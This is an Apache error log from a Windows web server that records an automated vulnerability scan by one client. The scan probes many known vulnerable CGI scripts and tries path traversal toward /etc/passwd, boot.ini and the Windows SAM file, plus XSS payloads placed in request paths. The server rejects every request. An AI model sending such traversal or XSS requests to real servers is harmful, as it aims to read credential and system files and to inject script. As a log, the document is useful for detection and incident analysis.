[Wed Sep 29 21:31:38.258511 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34974] script not found or unable to stat: E:/nuevo/htdocs/cgi-bin
[Wed Sep 29 21:31:38.492512 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34974] script not found or unable to stat: E:/nuevo/htdocs/admin.cgi
[Wed Sep 29 21:31:39.334913 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34974] script not found or unable to stat: E:/nuevo/htdocs/quikstore.cgi
[Wed Sep 29 21:31:41.176717 2021] [proxy:error] [pid 10816:tid 21208] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:31:41.176717 2021] [proxy_ajp:error] [pid 10816:tid 21208] [client 65.94.34.16:34974] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:31:44.281122 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34976] script not found or unable to stat: E:/nuevo/cgi-bin/archie
[Wed Sep 29 21:31:44.405922 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34976] script not found or unable to stat: E:/nuevo/cgi-bin/calendar.pl
[Wed Sep 29 21:31:44.515123 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34976] script not found or unable to stat: E:/nuevo/cgi-bin/calendar
[Wed Sep 29 21:31:44.639923 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34976] script not found or unable to stat: E:/nuevo/cgi-bin/date
[Wed Sep 29 21:31:44.780323 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34976] script not found or unable to stat: E:/nuevo/cgi-bin/fortune
[Wed Sep 29 21:31:44.905123 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34976] script not found or unable to stat: E:/nuevo/cgi-bin/redirect
[Wed Sep 29 21:31:45.029923 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34976] script not found or unable to stat: E:/nuevo/cgi-bin/uptime
[Wed Sep 29 21:31:45.139124 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34976] script not found or unable to stat: E:/nuevo/cgi-bin/wais.pl
[Wed Sep 29 21:31:46.886327 2021] [proxy:error] [pid 10816:tid 21208] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:31:46.886327 2021] [proxy_ajp:error] [pid 10816:tid 21208] [client 65.94.34.16:34976] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:31:47.089127 2021] [core:error] [pid 10816:tid 21208] [client 65.94.34.16:34978] AH00038: Forbidden: E:/nuevo/htdocs/lpt9 doesn't point to a file or directory
[Wed Sep 29 21:31:47.557128 2021] [core:error] [pid 10816:tid 21208] [client 65.94.34.16:34978] AH00038: Forbidden: E:/nuevo/htdocs/lpt9 doesn't point to a file or directory
[Wed Sep 29 21:31:47.775528 2021] [authz_core:error] [pid 10816:tid 21208] [client 65.94.34.16:34978] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Wed Sep 29 21:31:48.009529 2021] [authz_core:error] [pid 10816:tid 21208] [client 65.94.34.16:34978] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/db_details_importdocsql.php
[Wed Sep 29 21:31:50.255933 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34978] script not found or unable to stat: E:/nuevo/htdocs/sqlqhit.asp
[Wed Sep 29 21:31:50.365133 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34978] script not found or unable to stat: E:/nuevo/htdocs/SQLQHit.asp
[Wed Sep 29 21:32:09.475166 2021] [core:error] [pid 10816:tid 21192] [client 65.94.34.16:34980] AH00038: Forbidden: E:/nuevo/cgi-bin/com5 doesn't point to a file or directory
[Wed Sep 29 21:32:09.475166 2021] [core:error] [pid 10816:tid 21208] [client 65.94.34.16:34978] AH00038: Forbidden: E:/nuevo/cgi-bin/com5 doesn't point to a file or directory
[Wed Sep 29 21:32:09.584367 2021] [core:error] [pid 10816:tid 21192] [client 65.94.34.16:34980] AH00038: Forbidden: E:/nuevo/cgi-bin/com5 doesn't point to a file or directory
[Wed Sep 29 21:32:09.709167 2021] [core:error] [pid 10816:tid 21192] [client 65.94.34.16:34980] AH00038: Forbidden: E:/nuevo/cgi-bin/com5 doesn't point to a file or directory
[Wed Sep 29 21:32:09.943167 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34980] script not found or unable to stat: E:/nuevo/cgi-bin/testing_whatever
[Wed Sep 29 21:32:10.286368 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34980] script not found or unable to stat: E:/nuevo/cgi-bin/mail
[Wed Sep 29 21:32:10.395568 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34980] script not found or unable to stat: E:/nuevo/cgi-bin/nph-error.pl
[Wed Sep 29 21:32:10.520368 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34980] script not found or unable to stat: E:/nuevo/cgi-bin/post-query
[Wed Sep 29 21:32:10.629568 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34980] script not found or unable to stat: E:/nuevo/cgi-bin/query
[Wed Sep 29 21:32:10.738769 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34980] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi.tcl
[Wed Sep 29 21:32:10.879169 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34980] script not found or unable to stat: E:/nuevo/cgi-bin/test-env
[Wed Sep 29 21:32:11.097569 2021] [core:error] [pid 10816:tid 21192] [client 65.94.34.16:34980] AH00135: Invalid method in request get / HTTP/1.1
[Wed Sep 29 21:32:11.331570 2021] [core:error] [pid 10816:tid 21192] [client 65.94.34.16:34982] AH00135: Invalid method in request INDEX / HTTP/1.1
[Wed Sep 29 21:32:12.111571 2021] [core:error] [pid 10816:tid 21192] (20025)The given path contained wildcard characters: [client 65.94.34.16:34984] AH00036: access to /*.* failed (filesystem path 'E:/nuevo/htdocs/*.*')
[Wed Sep 29 21:32:12.298771 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34984] script not found or unable to stat: E:/nuevo/cgi-bin/cgi_process
[Wed Sep 29 21:32:12.922772 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34984] script not found or unable to stat: E:/nuevo/cgi-bin/index.js0x70
[Wed Sep 29 21:32:15.200376 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34986] script not found or unable to stat: E:/nuevo/cgi-bin/cgitest.exe
[Wed Sep 29 21:32:16.323578 2021] [proxy:error] [pid 10816:tid 21192] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:32:16.323578 2021] [proxy_ajp:error] [pid 10816:tid 21192] [client 65.94.34.16:34986] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:32:16.541979 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34988] script not found or unable to stat: E:/nuevo/cgi-bin/hpnst.exe
[Wed Sep 29 21:32:17.103580 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34988] script not found or unable to stat: E:/nuevo/cgi-bin/Pbcgi.exe
[Wed Sep 29 21:32:17.228380 2021] [cgi:error] [pid 10816:tid 21192] [client 65.94.34.16:34988] script not found or unable to stat: E:/nuevo/cgi-bin/testcgi.exe
[Wed Sep 29 21:32:37.820416 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34992] script not found or unable to stat: E:/nuevo/cgi-bin/snorkerz.bat
[Wed Sep 29 21:32:37.945216 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34992] script not found or unable to stat: E:/nuevo/cgi-bin/snorkerz.cmd
[Wed Sep 29 21:33:18.943088 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35000] script not found or unable to stat: E:/nuevo/cgi-bin/webfind.exe
[Wed Sep 29 21:33:20.206691 2021] [proxy:error] [pid 10816:tid 21000] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:33:20.206691 2021] [proxy_ajp:error] [pid 10816:tid 21000] [client 65.94.34.16:35000] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:33:20.409491 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35002] script not found or unable to stat: E:/nuevo/cgi-bin/ans.pl
[Wed Sep 29 21:33:20.534291 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35002] script not found or unable to stat: E:/nuevo/cgi-bin/ans
[Wed Sep 29 21:33:22.156694 2021] [core:error] [pid 10816:tid 21000] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35002] AH00127: Cannot map GET /................../config.sys HTTP/1.1 to file
[Wed Sep 29 21:33:23.435896 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35002] script not found or unable to stat: E:/nuevo/cgi-bin/Album
[Wed Sep 29 21:33:23.810297 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35002] script not found or unable to stat: E:/nuevo/cgi-bin/SQLServ
[Wed Sep 29 21:33:23.919497 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35002] script not found or unable to stat: E:/nuevo/cgi-bin/stats
[Wed Sep 29 21:33:24.028697 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35002] script not found or unable to stat: E:/nuevo/cgi-bin/test.bat
[Wed Sep 29 21:33:24.153498 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35002] script not found or unable to stat: E:/nuevo/htdocs/cgi-bin
[Wed Sep 29 21:33:24.262698 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35002] script not found or unable to stat: E:/nuevo/cgi-bin/input.bat
[Wed Sep 29 21:33:24.371898 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35002] script not found or unable to stat: E:/nuevo/cgi-bin/input2.bat
[Wed Sep 29 21:33:24.793099 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35002] AH00126: Invalid URI in request GET /../../../../../../../../../boot.ini HTTP/1.1
[Wed Sep 29 21:33:25.073899 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35004] AH00126: Invalid URI in request GET /../../../../winnt/repair/sam._ HTTP/1.1
[Wed Sep 29 21:33:25.869501 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35006] AH00126: Invalid URI in request GET ////./../.../boot.ini HTTP/1.1
[Wed Sep 29 21:33:30.830309 2021] [core:error] [pid 10816:tid 20872] [client 65.94.34.16:35008] AH00126: Invalid URI in request GET /DomainFiles/*//../../../../../../../../../../etc/passwd HTTP/1.1
[Wed Sep 29 21:33:32.483912 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/htdocs/nph-showlogs.pl
[Wed Sep 29 21:33:32.593112 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/htdocs/nph-showlogs.pl
[Wed Sep 29 21:33:33.934715 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/admin.cgi
[Wed Sep 29 21:33:34.059515 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/14all.cgi
[Wed Sep 29 21:33:34.168715 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/14all-1.1.cgi
[Wed Sep 29 21:33:34.293515 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/anacondaclip.pl
[Wed Sep 29 21:33:34.402716 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/auktion.cgi
[Wed Sep 29 21:33:34.511916 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/bigconf.cgi
[Wed Sep 29 21:33:34.621116 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/bb-hostsvc.sh
[Wed Sep 29 21:33:34.745916 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/bb-hist
[Wed Sep 29 21:33:34.855116 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/bb-hist.sh
[Wed Sep 29 21:33:34.964317 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/common.php
[Wed Sep 29 21:33:35.089117 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/commerce.cgi
[Wed Sep 29 21:33:35.198317 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/cgiforum.pl
[Wed Sep 29 21:33:35.307517 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/cal_make.pl
[Wed Sep 29 21:33:35.432317 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/db4web_c
[Wed Sep 29 21:33:35.541518 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/db4web_c
[Wed Sep 29 21:33:35.650718 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/directorypro.cgi
[Wed Sep 29 21:33:35.759918 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/emumail
[Wed Sep 29 21:33:35.869118 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/emumail.cgi
[Wed Sep 29 21:33:35.993918 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/emu
[Wed Sep 29 21:33:36.103119 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/faxsurvey
[Wed Sep 29 21:33:36.212319 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/faqmanager.cgi
[Wed Sep 29 21:33:36.337119 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/ezshopper
[Wed Sep 29 21:33:36.446319 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/generate.cgi
[Wed Sep 29 21:33:36.555519 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/generate.cgi
[Wed Sep 29 21:33:36.664720 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/generate.cgi
[Wed Sep 29 21:33:36.773920 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/htmlscript
[Wed Sep 29 21:33:36.898720 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/htgrep
[Wed Sep 29 21:33:37.007920 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/hsx.cgi
[Wed Sep 29 21:33:37.132720 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/sewse
[Wed Sep 29 21:33:37.257521 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/sbcgi
[Wed Sep 29 21:33:37.366721 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/mrtg.cgi
[Wed Sep 29 21:33:37.475921 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/mrtg.cfg
[Wed Sep 29 21:33:37.585121 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/main.cgi
[Wed Sep 29 21:33:37.709921 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/main.cgi
[Wed Sep 29 21:33:37.819122 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/mail
[Wed Sep 29 21:33:37.928322 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/mail
[Wed Sep 29 21:33:38.053122 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/loadpage.cgi
[Wed Sep 29 21:33:38.177922 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/loadpage.cgi
[Wed Sep 29 21:33:38.427523 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/htsearch
[Wed Sep 29 21:33:38.583523 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/shop.cgi
[Wed Sep 29 21:33:38.708323 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/sendtemp.pl
[Wed Sep 29 21:33:38.833123 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/search
[Wed Sep 29 21:33:38.973524 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/search.pl
[Wed Sep 29 21:33:39.082724 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/search.cgi
[Wed Sep 29 21:33:39.191924 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/search.cgi
[Wed Sep 29 21:33:39.316724 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/quickstore.cgi
[Wed Sep 29 21:33:39.425924 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/publisher
[Wed Sep 29 21:33:39.535125 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/php.cgi
[Wed Sep 29 21:33:39.706725 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/pals-cgi
[Wed Sep 29 21:33:39.815925 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/opendir.php
[Wed Sep 29 21:33:39.925125 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/nph-emumail.cgi
[Wed Sep 29 21:33:40.034325 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/newsdesk.cgi
[Wed Sep 29 21:33:40.143526 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/netauth.cgi
[Wed Sep 29 21:33:40.268326 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/multihtml.pl
[Wed Sep 29 21:33:40.377526 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/webdist.cgi
[Wed Sep 29 21:33:40.502326 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/way-board
[Wed Sep 29 21:33:40.611527 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/way-board.cgi
[Wed Sep 29 21:33:40.720727 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/viewsource
[Wed Sep 29 21:33:40.829927 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/ttawebtop.cgi
[Wed Sep 29 21:33:40.939127 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/traffic.cgi
[Wed Sep 29 21:33:41.063927 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/technote
[Wed Sep 29 21:33:41.188728 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/technote
[Wed Sep 29 21:33:41.302928 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/talkback.cgi
[Wed Sep 29 21:33:41.412128 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/story
[Wed Sep 29 21:33:41.521328 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/story.pl
[Wed Sep 29 21:33:41.630529 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/store
[Wed Sep 29 21:33:41.755329 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] script not found or unable to stat: E:/nuevo/cgi-bin/store.cgi
[Wed Sep 29 21:33:41.864529 2021] [core:error] [pid 10816:tid 20872] [client 65.94.34.16:35010] AH00126: Invalid URI in request GET /cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Wed Sep 29 21:33:42.082929 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/sojourn.cgi
[Wed Sep 29 21:33:42.192130 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/simple
[Wed Sep 29 21:33:42.301330 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/shopper.cgi
[Wed Sep 29 21:33:42.644530 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/htdocs/logbook.pl
[Wed Sep 29 21:33:42.753731 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/sawmill5
[Wed Sep 29 21:33:42.862931 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/htdocs/page.cgi
[Wed Sep 29 21:33:43.206131 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/zml.cgi
[Wed Sep 29 21:33:43.315332 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/YaBB.pl
[Wed Sep 29 21:33:43.424532 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/whois_raw.cgi
[Wed Sep 29 21:33:43.549332 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/whois
[Wed Sep 29 21:33:43.658532 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/whois.cgi
[Wed Sep 29 21:33:43.783332 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/webspirs.cgi
[Wed Sep 29 21:33:43.892533 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/webplus
[Wed Sep 29 21:33:44.001733 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] script not found or unable to stat: E:/nuevo/cgi-bin/webmail
[Wed Sep 29 21:33:44.563334 2021] [core:error] [pid 10816:tid 20872] [client 65.94.34.16:35012] AH00126: Invalid URI in request GET /..\\..\\..\\..\\..\\..\\temp\\temp.class HTTP/1.1
[Wed Sep 29 21:33:44.797334 2021] [core:error] [pid 10816:tid 20872] [client 65.94.34.16:35014] AH00126: Invalid URI in request GET /../../../../../../../../../../etc/passwd HTTP/1.1
[Wed Sep 29 21:33:45.015735 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35016] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../boot.ini HTTP/1.1 to file
[Wed Sep 29 21:33:45.124935 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35016] AH00127: Cannot map GET /................../etc/passwd HTTP/1.1 to file
[Wed Sep 29 21:33:45.249735 2021] [core:error] [pid 10816:tid 20872] (20025)The given path contained wildcard characters: [client 65.94.34.16:35016] AH00036: access to /?.jsp failed (filesystem path 'E:/nuevo/htdocs/?.jsp')
[Wed Sep 29 21:33:45.405735 2021] [core:error] [pid 10816:tid 20872] [client 65.94.34.16:35016] AH00126: Invalid URI in request GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini HTTP/1.1
[Wed Sep 29 21:33:45.639736 2021] [core:error] [pid 10816:tid 20872] [client 65.94.34.16:35018] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Wed Sep 29 21:33:47.246538 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35020] script not found or unable to stat: E:/nuevo/cgi-bin/classifieds
[Wed Sep 29 21:33:48.260540 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35024] script not found or unable to stat: E:/nuevo/htdocs/cgi-bin
[Wed Sep 29 21:33:48.728541 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35024] script not found or unable to stat: E:/nuevo/htdocs/author.asp
[Wed Sep 29 21:33:49.071742 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35024] script not found or unable to stat: E:/nuevo/cgi-bin/horde
[Wed Sep 29 21:33:50.194944 2021] [proxy:error] [pid 10816:tid 20872] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:33:50.194944 2021] [proxy_ajp:error] [pid 10816:tid 20872] [client 65.94.34.16:35024] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:33:51.458546 2021] [proxy:error] [pid 10816:tid 20872] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:33:51.458546 2021] [proxy_ajp:error] [pid 10816:tid 20872] [client 65.94.34.16:35026] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:33:54.609751 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35028] AH00127: Cannot map GET /666%0a%0a<script>alert('Vulnerable');</script>666.jsp HTTP/1.1 to file
[Wed Sep 29 21:33:55.483353 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35028] AH00127: Cannot map GET /<script>alert('Vulnerable')</script>.shtm HTTP/1.1 to file
[Wed Sep 29 21:33:55.592553 2021] [core:error] [pid 10816:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 65.94.34.16:35028] AH00127: Cannot map GET /<script>alert('Vulnerable')</script>.stm HTTP/1.1 to file
[Wed Sep 29 21:33:56.403755 2021] [cgi:error] [pid 10816:tid 20872] [client 65.94.34.16:35028] script not found or unable to stat: E:/nuevo/cgi-bin/redir.exe
